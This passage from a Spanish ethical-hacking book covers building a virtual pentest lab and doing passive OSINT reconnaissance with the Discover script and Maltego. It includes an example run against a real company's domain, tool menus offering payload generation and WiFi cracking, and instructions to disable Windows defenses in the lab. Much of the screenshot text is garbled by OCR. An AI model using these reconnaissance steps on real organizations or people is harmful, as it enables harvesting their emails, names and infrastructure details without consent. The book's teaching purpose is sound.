está aislada y corre sobre la primera, así que, si se crea algún problema en la 
máquina virtual, no causara problemas con la máquina principal, que es una 
de las principales razones, es decir, puedes hacer ataques, malwares, etc. contra un 
sistema virtual sin temor a afectar a tu sistema principal. 


Otra razón por lo cual la virtualización es muy útil, es mientras este prendida 
la máquina virtual divide los recursos del ordenador principal para asignarle a este, y 
mientras está apagada no utiliza recursos, así que no hará nuestro sistema principal 
más lento o menos poderoso por tener muchas máquinas virtuales. 


Así también si se causa algún error en una máquina virtual, podemos 
simplemente eliminarla o tener un respaldo antes de que diera el error. 


Existen dos softwares grandes que vamos a utilizar para esto, uno es 
VirtualBox, y el otro es VMware, el primero es software 100% abierto y gratis, 
hecho por Oracle, y el segundo es de paga, aunque tiene una versión gratis, sugiero 
usar VMware si tienes un sistema Windows, y VirtualBox si tienes un sistema OSX. 
En seguida explicaré como montar tu laboratorio en cada uno de estos sistemas. 


Cabe mencionar que dentro de virtualización hay algunos conceptos que 
debes conocer. Por ejemplo, el formato .ISO, casi siempre significa que es el disco 
de instalación de un sistema operativo, es decir, tienes que montar el disco en la 
máquina virtual, e instalar el sistema operativo como en cualquier máquina por 
medio de un disco virtual para que este funcione. Otro formato común, y más fácil 
de utilizar, es el OVF y el VMX, estos son formatos de importación, son mucho 
más fáciles de utilizar, el OVF es el formato abierto, es decir, es compatible con 
ambos VirtualBox y VMware, sin embargo, el formato BMP es el que usa VMware, 
así que batallaras un poco más si intentas importarlos en VirtualBox, sin embargo, 
si es posible utilizarlos también en VirtualBox, adicionalmente, existe el formato 
VMDK, también de VMware, este formato es para un disco o un almacenaje de 
una máquina virtual existente, es el equivalente a un disco duro en el mundo real, 
es posible utilizarlo para importar y mover máquinas de un ambiente virtual a otro. 


Para tener un laboratorio en el que podamos practicar todo lo que se ve en 
este curso, sugiero instalar los siguientes sistemas. 


Kali Linux 


Este es una distribución de Linux basada en debían diseñada especificamente 
para pruebas de penetración, es decir, para realizar ataques y pruebas informáticas, 
puedes encontrar los archivos en kali.org/downloads para instalarlo, sin embargo, te 
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sugiero instalar el que está en whitesuithacking.com/material-libro, teniendo cómo 
ventaja que fue modificado por mí y contiene herramientas extras que se verán en 
este libro que el sistema original no tiene. 


Windows 7 


Este sistema sugiero instalarlo para practicar algunos de los ataques más 
comunes a sistemas Windows, debido a que muchas vulnerabilidades de Windows 7 
y de los Windows Servers funcionan igual. 


Metasploitable 


Este sistema simula un ambiente Linux vulnerable en diferentes formas, 
desde ataques por medio de ftp, hasta algunos por medio de samba, será muy útil 
para practicar cómo atacar servidores Linux y que esperar al hacerlo. 


OWASP Broken Web Application Project (BWAP) 


Este sistema fue diseñado por la OWASP para que practiques como hackear 
aplicaciones y páginas web, tiene algunos ejemplos desde para practicar SQLi hasta 
para practicar hackear WordPress, así que es particularmente útil. 


Sugiero descargar estos archivos (son bastante ligeros) antes de seguir con la 
siguiente sección para que los instales. 


Estos sistemas los puedes descargar de su fuente oficial, o de https:// 
whitesuithacking.com/material-libro, donde subí los archivos de instalación para 
facilitarte el encontrarlos. 


Adicionalmente, encontrarás en esa página, videotutoriales GRATIS para 
ayudarte al proceso de la instalación, y todas las herramientas que necesites en 
este libro. 





- VIRTUALBOX VS. VMWARE 
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1.5.2 Windows & Macintosh 


En Windows es facil crear un laboratorio, especialmente si gozas de muchos 
recursos en tu sistema, en seguida explicaré como hacerlo con ambos softwares en su 
version gratis, y algunos de los posibles problemas que podrias tener. 


Es importante mencionar que tu procesador tiene que soportar virtualización 
(VT), aunque la mayoría de los procesadores lo soportan, así que si tienes una 
máquina moderna no deberías de preocuparte de esto. 


El proceso es el mismo en Macintosh, la diferencia es que en este sistema 
recomiendo más utilizar VirtualBox a VMware, sin embargo, los procesos de 
instalación son virtualmente los mismos en todos los sistemas operativos. 


1.5.2.1 VMWARE 


Lo primero que hay que hacer, es descargar VMware, la mejor opción es 
VMware Workstation Pro, pero no es gratis, así que la segunda mejor opción sería 
VMware Workstation Player, que funciona bastante bien, puedes encontrar este 
software gratis en https://vmware.com, en la sección de “Downloads”, instálalo en 
tu ordenador, y tendrás una pantalla similar a esta: 





Welcome to VMware 
Workstation 14 Player 


Create a New Virtual Machine 


Create a new virtual machine, which will then be added to 
the top of your library. 


Open a Virtual Machine 


Open an existing virtual machine, which will then be added 
to the top of your ibrary. 


Download a Virtual Appliance 


Download a virtual appliance from the marketplace. You 
can then open it in Player. 


Help 
View online help. 
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Lo segundo que debes hacer, es descargar el .ISO o sistema(s) que vayas 
a instalar en tu laboratorio, como ejemplo, voy a mostrar como instalar Kali, sin 
embargo, el proceso es el mismo en cualquier sistema que instales por medio de un 
ISO, solo debes seguir la instalación. 


Primero, hay que descargar el archivo del sistema. 


Posteriormente, debemos crear una nueva máquina virtual en VMware 


Welcome to VMware Workstation 14 Player 





Create a New Virtual Machine 
Create a new virtual machine, which will then be added taghe top of your library. 


Open a Virtual Machine 
Open an existing virtual machine, which will then be added to the top of your library. 


Download a Virtual Appliance 
Download a virtual appliance from the marketplace. You can then apen it in Player. 








Y, seguimos el instalador realizando los siguientes pasos: 
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New Virtual Machine Wizard 


Welcome to the New Virtual Machine Wizard 
A virtual machine is tke a physical computer; it needs an operating 
system. Hove wil you install the quest operating system? 


Install from: 





@ Installer disc image file {iso): 
| FA\os\Maquina WSH.iso vi | Browse... | 


¿A Could not detect which operating system is in this disc image. 
You wil need to spedfy which operating system wil be installed. 


OT will install the operating system later. 
The virtual machine wil be created with a blank hard disk. 




















New Virtual Machine Wizard 


Select a Guest Operating System 
Which operating system wii be installed on this virtual machine? 








[<Back [me ] [cancel 








Aqui le pones el nombre que quieras que tenga, y la ubicación donde quieres 
que se grabe: 


Y el número de GB que quieres que tenga tu máquina de almacenaje (nota, 
no se consumen hasta que los consumas dentro de la máquina virtual). Asegúrate de 
ponerle suficiente basado en que tanto usaras tu sistema, ya que, aunque posible, es 
tedioso modificarlo después (Yo sugiero 50GB). 
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New Virtual Machine Wizard 


How large do you want this disk to be? 


| The virtual machine's hard disk is stored as one or more files on the host computer's 
physical disk. These file{s) start small and become larger as you add applications, 
| files, and data to your virtual machine. 


| Recommended size for Debian 9.x: 20 GB 


| O Store virtual dsk as a single fle 
f Splitting the disk makes it easier to move the virtual machine to another computer | 
but may reduce performance with very large disks. 











Aqui es donde vas a configurar cuanta RAM quieren que tenga su maquina 
virtual (mientras mas tenga, mejor maneja multiples procesos), y también que tipo de 
adaptador red quieres que tenga, en seguida enlistare tus dos principales opciones: 





Memory 


Specify the amount of memory allocated to this virtual 
machine. The memory size must be a multiple of 4 MB. 


Ready to Create Virtual Machine 
Cikk Finish to create the virtual machine. Then you can instal Debian 9.x. 
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1. NAT 


Esto significa que tendrás acceso al internet, pero no a la red local (LAN), 
es decir, no podrás atacar a ningún ordenador fuera de tu máquina, aunque 
si podrías atacar sistemas con /Ps Globales, como lo son las páginas web. 
Recomiendo este modo si no quieres poner en riesgo otros sistemas en tu 
red local, o si estas en una red en la que no le asigna el DHCP IP local a 
tu máquina virtual. 


2. Conexión Puente (bridged) 


Este tipo de conexión le da a la interfaz de tu máquina virtual una 
conexión puente a la interfaz de tu sistema principal, lo que le permite 
tener una dirección IP en la LAN, Proveyendo a tu sistema virtual tener 
acceso a recursos y sistemas en la red local. 


Esta es mi configuración preferida porque mientras que este en una red 
personal de forma que no afecte negativamente a nadie con mis pruebas. 








~ | Connected 
Connect at power on 


O Bridged: Connected directly to the physical network 


@ NAT: Used to share the hosts IP address 
Odost-only: A private network shared with the host 
© Custom: Specific virtual network 




















Una vez que terminemos con esto, hacemos clic en finish, y listo, tenemos 
una maquina virtual en nuestro VMware. 
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El sistema aún no está instalado, asi que debemos hacer clic en “play” (el 
botón verde) para inicializar el sistema e instalarlo. 








Kali Linux 


State: Powered Off 
: Debian 9.x 
Workstation £4.x virtual machine 
: 268 


> Play virtua! machine 


ay Edit virtual machine settings 


Para ver instrucciones de instalación de Kali, ver la sección de Instalando 


Kali Linux. 


1.5.2.2 VIRTUALBOX 


Para instalar el sistema en VirtualBox, el proceso es muy similar al anterior, 
deberás primeramente descargar el programa de https://virtualbox.org, y luego de 
haber terminado la instalación, crear una nueva máquina virtual. 


Dad na tab Manage: 


e Atachine Heip 


Welcome to VirtusSext 

Tre eh 038 OF DE no TH Yea machines and MA PRL gros OF 
your comovter, The lets empty now becuse pou havevtcrestes are vr tas 
anes yet, 


incer erase a new urnak wadane, press the tow buronin he man wol aw 
erstes at Oe tee e werden. 


‘Tou cen mere the Pi key io petinrtant halo, or wet nem. ctu ara fo more 
formation and Sect Tene. 
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| < Create Virtual Machine 


Name and operating system 


Please choose a descriptive name for the new virtual machine 

and select the type of operating system you intend to install on 
it, The name you choose will be used throughout VirtualBox to 

identify this machine. 


Name: [rabino] 








€ Create Virtual Machine 


Memory size 


Select the amount of memory ¿RAM) in megabytes to be 
allocated to the virtual machine. 


The recommended memory size is 1024 MB. 
ERNE ARS [3072 E = 


65536 MB 
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€ Create Virtual Machine 


Hard disk 


If you wish you can add a virtual hard disk to the new machine. 
You can either create a new hard disk file or select one from 
the list or from another location using the folder icon. 


If you need a more complex storage set-up you can skip this 
step and make the changes to the machine settings once the 
machine is created. 

The recommended size of the hard disk is 8.02 GB. 

O Doe not add a virtual hard disk 

@ Create a virtual hard disk now 


© Use an existing virtual hard disk file 


Create Virtual Hard Disk 


Hard disk file type 


Please choose the type of fie that you would like to use for the new virtual 
hard disk. If you do net need to use it with other virtualization software you 
can leave this setting unchanged. 


(O) VDI (VirtualBox Disk Image) 
O YHD (Virtual Hard Disk) 
O YMDK (Virtual Machine Disk) 
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€ Create Virtual Hard Disk 


Storage on physical hard disk 


Please choose whether the new virtual hard disk file should grow as it is used 
{dynamically allocated) or if it should be created at its maximum size (fixed 
size}. 

A dynamically allocated hard disk file will only use space on your physical 
pol rr ques Aro Obes end oud), ra 
again automatically when space on itis freed. 


A fixed size hard disk file may take longer to ceate on some systems but is 
often faster to use. 


@ Dynamically allocated 
O Fixed size 


€ Create Virtual Hard Disk 


File location and size 


Please type the name of the new virtual hard disk file into the box below ar dick 
on the folder icon to select a different folder to create the file in. 





[kali Linux 


Ja 


Select the size of the virtual hard disk in megabytes. This size is the limit on the 
amount of file data that a virtual machine will be able to store on the hard disk. 
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LA seratPorts 
S vs 


(Ga) Shared Folders 

















|i Shared Folders 


| User Interface | 











Debemos decirle a la máquina, que ISO va a utilizar para instalar el sistema 
operativo. Seguimos la ruta Settings > Storage > Empty(disco) > Optical Drives 
> Choose file y seleccionamos nuestro archivo ISO dónde está nuestro sistema 
operativo. 


Para instalar Kali Linux, véase la sección Instalando Kali Linux. 
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Después de estos pasos, simplemente presionamos el botón “Start”, o 
“Iniciar”, e iniciamos el proceso de instalación. 


En VirtualBox, en algunos sistemas como Kali, se debe de activar la opción PAE en la 
sección de procesador. 


1.5.3 Sistemas Operativos 


Ahora, te guiaré para la instalación de varios sistemas operativos, que, 
sugiero instales antes de continuar para que puedas practicar adecuadamente todos 
los ataques que veremos en este libro. 


Todos estos sistemas excepto Android (también se puede, pero por 
simplicidad, es más fácil usar un emulador externo) pueden ser instalados bastante 
fácil en VMware o VirtualBox. Mientras tengas memoria para instarlos puedes instalar 
todos los sistemas operativos ya que no toman otros recursos (como procesamiento o 
RAM) mientras están apagadas. 


1.5.3.1 INSTALANDO KALI LINUX 


Al iniciar, te aparecerá una ventana similar a esta: 


y 


ees el 


Bapt menu 
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Aqui te permite varias opciones. La primera te permitirá utilizar el sistema 
sin instalarlo, la ventaja es que te ahorras tiempo de instalación, ya que se inicia 
inmediatamente; la desventaja, es que todo lo que hagas se borra al apagar el 
sistema. 


Así que se optará por instalar el sistema, en la opción: “Graphical Install” 


y 


A 


N 
Graphical install 


ech syntii 


Select a language 


Choose the language to be used for the installation process. The selected language will alsa be the 
default language for the installed system. 


Language: 

Camese (simpimreay FA 

Chinese (Traditional) - FxXIEB) 

Croatian - Hrvatski 

Czech - Čeština 

Danish - Dansk 

Dutch - Nederlands k 
Dzongkha - Eu 


Esperanto - Esperanto 

Estonian - Eesti 

Finnish - Suomi 

French - Francais 

Galician - Galego 

Georgian - payee 
- Deutsch 


a Ses | AO | 
Screenshot Go Back Continue | 
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Después de esto, primero seleccionamos el lenguaje. 


Configure the keyboard 


Albanian 
| Arabic 
Í Asturian 
: Bangladesh 
Í Belarusian 
| Bengali 
| Belgian 
Í Bosnian 
Brazilian 
-British English 
f Bulgarian {BDS layout} 
| Bulgarian (phonetic layout) 
| Burmese 
| Canadian French 
Í Canadian Multilingual 





A. -_ 
Go Back | Continue 


Configure the network 


The hostname is a single word that identifies your system to the network. if you don't know what your 
hostname should be, consult your network administrator. if you are setting up your own home network, 
you can make something up here. 


Hostname: 








| Screenshot | | GoBack j Continue f 
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Y la contraseña de nuestro usuario root (la contraseña default es toor). 


Set up users and passwords 


You need to set a password for root, the system administrative account. A malicious or unqualified user 
with root access can have disastrous results, so you should take care to choose a root password that is 


not easy to guess. It should not be a word found in dictionaries, or a word that could be easily 
associated with you. 


A good password will contain a mixture of letters, numbers and punctuation and should be changed at 
: regular intervals. 


: The root user should not have an empty password. if you leave this empty, the root account will be 


: disabled and the system's initial user account will be given the power to become root using the "sudo" 
command. 


Note that you will nat be able to see the password as you type it. 
Root password: 


SE SSS ES 


O Show Password in Clear 


Please enter the same root password again to verify that you have typed it correctly. 
Re-enter password to venfy: 


O Show Password in Clear 


Screenshot 


Configure the dock 


ifthe desired time zone is not listed, then please go back to the step "Choose language” and select a 
country that uses the desired time zone (the country where you live or are located). 
Select your time Zon 


Easte: 


Mountain 
Pacific 
Alaska 
Hawaii 
Arizona 

East Indiana 


Samoa 


Screenshot 


TE 
GoBack { Continue | 





La zona horaria que se utilizara. Y lo siguiente sugiero seguir las instrucciones 
de las imágenes. 
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kasta the GR bost loader on a hard disk 


you perd 10 meke the newt installed system beet able. by mtalina the GAS bort loader on a bostable 
Gove. The usual way to de this ds te install GRUG on the master boot record of gour first hard debes, H 

you prefer you can inate GRUB shewhere on ths drive, of ta another drive, of eyen to a Happy. 
Denge lor bont bede satatason: 


Enter gece manual 





Finish the installation 


installation complete 


installation is complete, so it is time to boot into your new system. Make sure to remove the 
installation media, so that you boot into the new system rather than restarting the installation. 


Screenshot 


Continue 
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Si decidiste descargar el que esta en mi pagina al iniciarlo, para que se auto 
configure, deberás escribir en una consola de comandos esto: /etc/init.d/ws start 


# fetc/init.d/ws start 





Adicionalmente, para actualizarlo la siguiente vez, deberás escribir en la 
consola de comandos lo siguiente: apt-get update && apt-get upgrade -y 


Recomiendo actualizarlo mínimo una vez a la semana, y de ser posible, 
siempre antes de usarlo. 


1.5.3.2 INSTALANDO WINDOWS 7 


En este caso, descarga la ISO de la página de materiales, y crea una máquina 
virtual de Windows 7 en VMware o VirtualBox, y cargaras en el apartado de disco el 
ISO, luego de esto, solo prende la máquina y sigue el proceso de instalación común 
de Windows. 


Aquí es donde agregaremos el ISO en las configuraciones de VMware. 


Virtual Machine Settings 





Device status 


| Network Adapter 
¿usa controler 

| @) sound Card 

| Printer 

| Biephay 
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Y aqui es donde agregaremos el ISO en las configuraciones de VirtualBox 




















Cuando termines el proceso de instalación, te recomiendo desactivar el 
antivirus de Windows, las actualizaciones automáticas, y el firewall para que no 
interfieran con las prácticas. 


1.5.4 Instalando Linux Vulnerable de pruebas 


Para instalar Metasploitable 2, que es el Linux vulnerable que utilizaremos 
para nuestras prácticas, en tu laboratorio virtual, primero descárgalo de la página de 
materiales, y seguido de eso, descomprímelo. 


Ahora, va a variar un poco dependiendo si usas VMware o VirtualBox, así 
que mencionare ambas formas. 


1.5.4.1 VMWARE 


Esta es la forma más sencilla, ya que simplemente tienes que jalar el archivo 
.VMX a VMware y aceptar la importación. 


11/25/2017 332 PM VMware Virtual Mu. | 
10/18/2018 &32 AM VMware virtual dis... E 
5/21/2012 46AM  VMwere snapshot... 


7182018 3:32 AM VMware virtual mas 
STO ITAM VMware Team Me... 
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Otra alternativa es simplemente abrir el archivo desde VMware en archivos 
abrir, y luego seleccionar el archivo .vmx. 


Sean for Virtual Machines... 
Close Tab 


Connect to Server... 

Virtualize a Physical Machine... 
Export to OVF... 

Map Virtual Disks... 


Bat 





1.5.4.2 VIRTUALBOX 


En VirtualBox el proceso es ligeramente mas tardado, pero decentemente 


sencillo, aun asi, tendremos que crear una maquina virtual de Linux (Ubuntu 
funciona bien). 


Y Oracle VM VirtualBox Manages 


File Machine Help 





< Create Virtual Machine 


| 
i 


Name and operating system 


Please choose a descriptive name for the new virtual machine 
and select the type of operating system you intend to install on 
it. The name you choose will be used throughout VirtualBox to 


tone: igen id 


"= EN -E 


a 
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Presiona siguiente, ponle mínimo 500 Mb de RAM, y cuando llegues a la 
siguiente pantalla, selecciona la opción de utilizar un disco de almacenamiento que 
ya existe, haz clic en la opción de elegir archivos, y selecciona el archivo .VMDK. 


€ Creste Virtual Machine 


Hard disk 


If you wish you can add a virtual hard disk to the new machine. 
You can either create a new hard disk file or select one from 
the list or from another location using the folder icon. 

If you need a more complex storage set-up you can skip this 
step and make the changes to the machine settings once the 
machine is weated. 

The recommended size of the hard disk is 16.00 GB. 

O Do not add a virtual hard disk 


(8) Use an existing virtual hard disk file 
'Metasploitable.vmck (Normal, 8.00 GB} rá 











Y listo, presiona crear, e inicia la máquina virtual. 


1.5.5 Instalando emulador Android 


En el caso de Android, para este libro es opcional, ya que bien podrías 
utilizar tu móvil Android para realizar las prácticas, pero si no tienes un Smartphone 
Android, o prefieres no hacer pruebas en este, una opción (entre muchas, esta NO es 
la única alternativa) es utilizar el emulador de Android NOX, que puedes instalar en 


http://bignox.com/ . 

Para instalarlo, simplemente sigue el proceso de cualquier instalador en 
Windows o Macintosh, solo al momento de descargar en la página, selecciona la 
versión compatible con tu sistema (en mi caso me aparece en el botón rojo la versión 
de Windows, pero como puedes ver, abajo hay un botón para descargar en Mac). 


The perfect Android emulator 7 
to play mobile games on PC | 


NoxPlayeró 


Smooth Gameplay Strong Compatb 


DOWNLOAD 
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Simplemente sigue el proceso, y para instalar aplicaciones podras hacerlo 
desde el navegador del Android emulado, o jalando los archivos .APK al sistema. 


Search Game, App. 





1.5.6 Instalando servidor web vulnerable 


Para instalar este sistema, es el mismo proceso que Metasploitable, 
selecciona e importa el archivo .VMX si estás usando VMware, o importa el disco 
-VMDK si estás utilizando VirtualBox en una máquina virtual Linux (Ubuntu por 
ejemplo funciona). 


E OWASP Broken Web Apps.nvram 10/13/2018 1:40 PM VMware Virtual M.. 
(2) OWASP Broken Web Apps.vmsd 7/30/2015 10:25 PM = VMware snapshot ... 
ul OWASP Broken Web Apps.vmx 10/13/2018 1:40PM VMware virtual M.. 


OWASP Broken Web Apps.vrméÉ 9/23/2018 &12 PM VMware Team Me... 
& OWASP Broken Web Apps-cll. vmdk 10/9/20184:00 PM VMware virtual dis... 





RECONOCIMIENTO 


Ahora que ya tienes tu laboratorio de pentesting listo para utilizar, 
empezaremos con la metodología de prueba de penetración. De aqui en adelante casi 
todo será practico, así que sugiero seguir las prácticas de este libro en tu laboratorio, 
y practicar cada fase las veces que necesites hasta que lo domines. 


La primera pregunta que se hace es ¿qué es reconocimiento? Si pusiste 
atención en la primera sección de libro, recordarás que el reconocimiento, o 
“Intelligence Gathering”, como lo encontrarías en inglés, es la fase en la que obtienes 
información relevante a tu objetivo, desde correos, profesión, topología de la red, 
puertos y servicios, sistema operativo, etc.; y esencialmente existen dos tipos de 
reconocimiento, el reconocimiento activo, y el reconocimiento pasivo. En esta 
sección veremos ambos y por qué son importantes. 


2.1 RECONOCIMIENTO PASIVO 


El reconocimiento pasivo, es el tipo de reconocimiento que no interactúa con 
el sistema directamente para obtener información de este, sino que, utiliza fuentes 
externas, como Google, Bing, Shodan, Builtwith, etc, para obtener información de 
este, por medio de búsquedas. 


Piénsalo como cuando en tu secundaria te gustaba una chica o chico, y 
en vez de preguntarle directamente “¿te gusto?”, le preguntas a tu amiga/o que le 
preguntara a su amiga/o (una cadena), este tipo de reconocimiento pasivo se conoce 
como OSINT: Open Source Network Intelligence. 


Tenemos algunas ventajas y desventajas de obtener información por este 
medio, primero las ventajas, es información rápida, sin riesgo de ser detectados, 
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y potencialmente encontrar bastante información, ya que no es inusual que las 
organizaciones cometan errores en el manejo de su información pública, sin 
embargo, conlleva algunas desventajas como que esta no sea confiable y obtener 
menos información relevante que el reconocimiento directo. 


Sin embargo, la utilidad del reconocimiento pasivo no debe de ser ignorado, 
ya que, en casi todos los casos, se obtiene información relevante para la prueba de 
penetración. 


2.1.1 Información de dominios 


Whois es un protocolo para búsqueda de bases de datos de registro de 
dominios, e información de páginas web. 


Puedes hacer búsquedas Whois en servicios tales como http://who.is/ 
whois/, pero, en varias de las herramientas próximas se hacen búsquedas Whois 
automatizadas. 


De esta forma puedes saber a qué nombre está registrado un dominio, a que 
IP/servidor se conecta el DNS, que hosting está utilizando y más información que 
puede ser útil; en algunos casos se puede obtener la dirección del administrador de 
alguna página web y/o el teléfono personal de este. 


2.1.2 OSINT - Obtener correos, números, nombres y otras cosas 


Discover es un script hecho en bash para OSINT que es muy útil en diferentes 
situaciones. Este script, aunque muy sencillo, potencialmente te ahorra horas de 
trabajo, ya que automatiza la ejecución de más de 10 herramientas por medio de sus 
scripts, como whois, The Harvester, entre otras, las ejecuta todas al mismo tiempo, 
de forma que tu no tengas que correr una por una para obtener información de un 
objetivo. 


Adicionalmente, la forma en la que presenta los resultados es especialmente 
útil, ya que lo organiza en un HTML en un formato que te ayudará a reportar los 
resultados fácilmente, ya que te da la información ya organizada. 


Para utilizar esta herramienta, primero debemos irnos a la carpeta en la que 
está el script, el cual en nuestro sistema lo encontrarás en la carpeta 


/opt/Reconocimiento/discover 
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Para entrar a esta, basta con escribir el comando “cd” antes del directorio, de 
la siguiente forma: 


cd /opt/Reconocimiento/discover 


Y si el archivo discover.sh no te aparece en verde cuando lo enlistas con 
Is, esto se debe porque no tiene permisos de ejecución, puedes resolverlo con el 
comando chmod +x discover.sh para darle adicionales permisos. 


# is 
get-pip.py pars 
LICENSE t 


README . md 





Para ejecutar el archivo, deberás escribir ./discover.sh 


# ./discover.sh 





Enseguida, se te abrirá un menú de opciones, preguntándote que quieres 
hacer, como verás, esta herramienta tiene opciones desde RECON, que son para 
reconocimiento, hasta MISC, que son scripts variados que sirven para distintas 
operaciones como romper la seguridad de un wifi. 


Domain 
Person 
Parse salesforce 


Generate target list 

CIDR 

List 

IP, range, or URL 

Rerun Nmap scripts and MSF aux. 


Insecure direct object reference 


. Open muitípie tabs in Firefox 
. Nikto 
= SSE 


. Crack WiFi 

. Parse XML 

. Generate a malicious payload 
. Start a Metasploit Listener 
. Update 

EXE 


Choice: 1 
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Para elegir una opción, escribes el número en la terminal, así que 
escribiremos el número 1, para utilizar un dominio para iniciar nuestro proceso de 
reconocimiento. 


Ya que estamos realizando reconocimiento pasivo, seleccionaremos la 
opción 1. 


1. Passive 
2. Active 
8; 


Previous menu 





Choice: 1 


Posteriormente, nos pedirá dos cosas, primero el nombre de la organización, y 
la segunda, el dominio de esta, presionamos enter después de escribir estos dos puntos. 


Company: Target 
Domain: target.com 


Company: Organizacion 
Domain: cinepolis.com 


Do you have a list of names from salesforce to import? (y/N) n 





Hay que tener en cuenta que a pesar de que no estamos dejando rastros 
directos en el servidor del objetivo, no es ético investigar organizaciones de este 
modo sin tener autorización previa, ya que podrías meterte en problemas si revelas 
algo confidencial, aunque solo estés “experimentando”, así que piensa bien a qué 
organización pones en estos campos. 


Después de haber presionado enter, seleccionamos la opción N (de no), si 
no tienes una lista de nombres que importar, y esperamos, un escaneo de estos puede 
tardar varios minutos en terminar. 


Finalmente, te debe de salir una pantalla así, diciendo que se grabó la 
información en la carpeta /root/data/(nombre de la organización), para continuar 
y ver el archivo, basta con presionar enter. 
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*=*Scan complete 


The supporting data folder is located at /root/data/ MMS 


Press <return> A | 





Después de abrir varias pestañas en tu navegador, la herramienta te entrega 
una página similar a esta, aquí organiza en secciones toda la información que encontró. 





En la sección de contactos > Emails encontrarás los correos que recuperó 
el programa, en muchas organizaciones, cometen el error en el que muchos correos 


que no deberían ser públicos, que, si son, por lo que podrían utilizarse para realizar 
ataques a la organización. 


CONTACTS + 





En la sección DNS > Maps, podrás encontrar mapas de DNS que te ayudarán 
a determinar las ubicaciones de algunos puntos claves de su red; como su servidor 
de correo electrónico, o quien les da el servicio de hosting. Enseguida te pongo una 
pequeña tabla de qué significa cada tipo de registro. 
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BISCOVER Ez SHTA - DNS > 


a 


CNAME Registro de Alias Crear Aliases 





SOA Registro de inicio de autoridad El registro maestro para la zona. 


En la sección Domain > Whois Domain, podrás encontrar al nombre 
de quien esté registrado ese dominio, especialmente en PyMES podrás encontrar 
información útil, es común que el dominio sea registrado a nombre del dueño del 
negocio, y generalmente por ahí se podría encontrar información sensible. 
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DISCOVER IOME DNTACTS DNE BOMAIN = 





Y, por último, en la sección Files, podrán encontrar los archivos que haya 
encontrado la herramienta en el servidor, usualmente no hay información sensible 
aquí, pero ha habido casos en los que los administradores cometen errores como 
estos, y por aquí se obtiene información confidencial, recuerden que esto es un juego 
de quien comete el primer error, y nosotros estamos buscando ese error en todas las 
maneras posibles. 


DISCOVER 
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Dentro de este archivo, se puede encontrar un gran rango de informacion del 
objetivo, desde topologia de la red, correos, nombres, archivos en su servidor, 
dominios registrados, ubicación del servidor de correos, etc, pero todo esto el 
programa cómodamente te lo dará cómo reporte en la sección de reportes, que te 
ayuda a organizar mejor la información para posteriormente reportarlo. 





2.1.2.1 ERRORES Y SOLUCIONES 


La primera vez que lo inicias, hay un error de permisos con la herramienta 
TheHarvester, para solucionarlo, solo escribe en la terminal: chmod +x /usr/share/ 
theharvester/theHarvester.py 


od +X /usr/share/theharvester/theHarvester . py 





2.1.3 Maltego 


Maltego es un software multiplataforma que se especializa en reconocimiento 
y obtención de información, particularmente de personas, ya que puede utilizar 
información como correo electrónico o usuarios, para encontrar datos de alguna 
persona o sus conocidos. 


Para utilizar esta herramienta, debes empezar por crear una cuenta en Paterva 
(los creadores de la herramienta) en la siguiente liga (es gratis): 


https: //www.paterva.com/web7/community/community.php 


PA Y E RVA ABOUT PRODUCTS QUOTES DOWNLOADS COMMUNITY DOCS CONTACT 
A nev tran Or AS 


Community 
Registration 
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Una vez que hayas creado tu cuenta, es tiempo de abrir el software en tu 
sistema Kali de la siguiente manera: 


Escribe en la terminal Maltego 


:-# maltego 


Al abrirse, entraras al software con la cuenta que acabas de crear ingresando 
tus datos en la siguiente pantalla y presionando siguiente en todo lo demas. 


Enter your details below to log in to the Maltego Community Server 
Or É you have not core se yet, reyster h. 


> Email Address cuentai@gmail.com 








Al llegar a la pantalla principal, presiona este botón, y se abrirá lo que 
conocemos en Maltego como graph(gráfica). 


b Create a new graph. 
(Ctri+T/Cmd+T) 


(i) Click the help button to get more help 
on Maltego featur... 





Este, esencialmente es tu espacio de trabajo, en donde vas a realizar tus 
investigaciones, notaras que a la izquierda hay un menú llamado “entity palet”, esta 
herramienta, hay un objetivo que se llama entidad, que simboliza la información y 
tipo de información que estas pidiendo o poniendo a la herramienta. 
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Aqui están algunas de las “entidades” disponibles en Maltego, en la paleta 
de entidades puedes verlas catalogadas por el tipo de información que busca obtener 
esa entidad. 

















| Membership of a social network 
dead A ~~ lA visual con of > 

embership. ‘of the Flickr social network ce ~ = = 3 

H | An IP version 4 address i 

--- | Membership of Twitter 


i An alias for a person 




























| An internet Autonomous System (AS) 



















5 Nominatim Lo... | Nominatim Location 
Relationship identified by Builtwith 


== RS Record 
... | A Technology identified by Builtwith 
ircular Area | A circular area somewhere on Earth et ccs saa ae 























| A business organization 
+ 








hone or camera 














Taj Document A document on the Internet 
D | An internet domain 











Twitter User List entity 
An internet Uniform Resource Locator (URL) 





















$ ocation on a World Geodetic System coord 
| Hash | Hash entity 











ESA Soman E Wen bees D 





Ahora, para empezar una investigación, debes tomar alguna entidad de la cual 
tengas información de la paleta de entidades, y jalarla a la gráfica, una vez en ellas, haz 
doble clic al texto de la entidad, y modifica el texto por la información que tú tienes. 


Por ejemplo, vamos a asumir que queremos investigar a una empresa y 
tenemos el nombre del dominio de su sitio. 
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Después de tener la entidad en la gráfica, y haber modificado la 
información, vamos a hacer clic derecho en la entidad, y aparecerá un menú llamado 
transformaciones, este es otro “objeto” de Maltego, este hace referencia a que 
podemos “transformar” una entidad a otra por este medio. Por ejemplo, si nosotros 
tenemos un dominio, y queremos los correos electrónicos de este, entonces vamos a 
“transformar” el dominio a correos electrónicos. 


Para hacer esto, basta con hacer clic en los símbolos de “+” para ver las 
opciones, y en los símbolos de flechas para iniciar la transformación. 


Alí Transforms 


+ DNS from Domain 
+ Domain owner detail 


Email addresses from Domain 





Posterior a la transformación (en este caso le puse “all transforms”), les 
aparecerá algo similar a esto, que muestra todo lo que pueda encontrar la herramienta, 
entre las opciones están: servidores, correos electrónicos, números telefónicos, y 
nombres de personas dentro de la organización. 






: a= 8 

2 Ca a 

| El A 04... e 

E See A A SS ee EnA SAS oe ae 
ee ee a ven 9 e 
a O NE 

5 ou A i 


Todas las líneas azules representan conexiones, y los símbolos, representan 
entidades, para este punto probablemente ya encontraste algo de información útil 
de tu objetivo, pero, todavía puedes ir más lejos, realizando transformaciones de los 
resultados, de la misma forma en la que te mostré anteriormente. 


84 ELLIBRO BLANCO DEL HACKER. 2° EDICIÓN ACTUALIZADA © RA-MA 


o. 


sa corn 





a -_2 
Ags eae Com 


Aqui, por ejemplo, la herramienta nos dice que ese correo es de esta persona 
en especifico. 


Maltego es una herramienta bastante completa y poderosa. Te recomiendo 
buscar documentación acerca de esta herramienta y su uso. 


2.1.4 El buscador de los hackers 


Shodan es un buscador, pero no cualquiera, le llaman el “buscador de los 
